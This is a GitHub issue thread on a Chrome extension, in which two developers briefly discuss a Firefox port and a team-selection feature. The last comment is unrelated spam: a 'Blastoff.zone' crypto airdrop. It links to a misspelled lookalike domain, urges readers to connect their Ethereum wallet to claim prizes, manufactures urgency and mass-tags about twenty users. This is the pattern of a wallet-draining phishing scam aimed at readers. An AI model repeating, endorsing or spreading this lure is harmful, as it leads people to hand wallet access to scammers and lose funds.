### ISSUE TITLE
Note to self: Firefox

### ISSUE THREAD

**Issue by SuperSpyTX** [maxwellsmart84/chromeext_ajax#1]
I'm probably going to port this over to Firefox when I have the time.

**Comment by maxwellsmart84** [comment]
Sounds good - I want to add an input field for team selection and then matchup the icon based on what they pick.

**Comment by SuperSpyTX** [comment]
Oooh that'd be pretty cool :D

**Comment by Cuzzie** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
WangZiHao752, @denodaeus, @byteshiva, @markmiro, @italoag, @kozy0810, @odanado, @qalqi, @lukehedger, @kristjank, @okyantoro, @vespaiach, @ifunjoke, @gustavonvp, @tykm, @5l1v3r1, @adarshsrivastava11, @chrisnft, @abdulwahed992, @freitasgouvea
